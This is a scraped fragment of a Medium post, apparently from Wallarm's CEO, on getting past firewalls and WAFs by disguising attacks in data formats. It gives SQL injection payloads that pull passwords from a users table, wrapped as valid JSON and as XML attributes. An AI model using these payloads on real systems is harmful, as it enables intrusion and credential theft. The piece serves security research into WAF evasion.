Bypassing NGFW/WAFs using data format obfuscations

  1. Using the Content-Type header
  2. Using the first suitable data format
  3. Requiring manual configuration of the data format for each field
?jdata={"json":"here"}
?injection={"'union/*":"*/select", ",2,password, ":" FROM users;#"}
' UNION SELECT 1,2,password,4 FROM users--a-
SQL injection payload as a valid JSON data
<?xml version="1.0"?><a att1="'union/*" att2="*/select" att3=",username," att4=" FROM user;#">I'm an XML. Trust me!</a>
SQL injection payload as a valid XML data

--

--

CEO at Wallarm. Application security platform to prevent threats and discover vulnerabilities in a real-time.

Love podcasts or audiobooks? Learn on the go with our new app.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Ivan Novikov

Ivan Novikov

CEO at Wallarm. Application security platform to prevent threats and discover vulnerabilities in a real-time.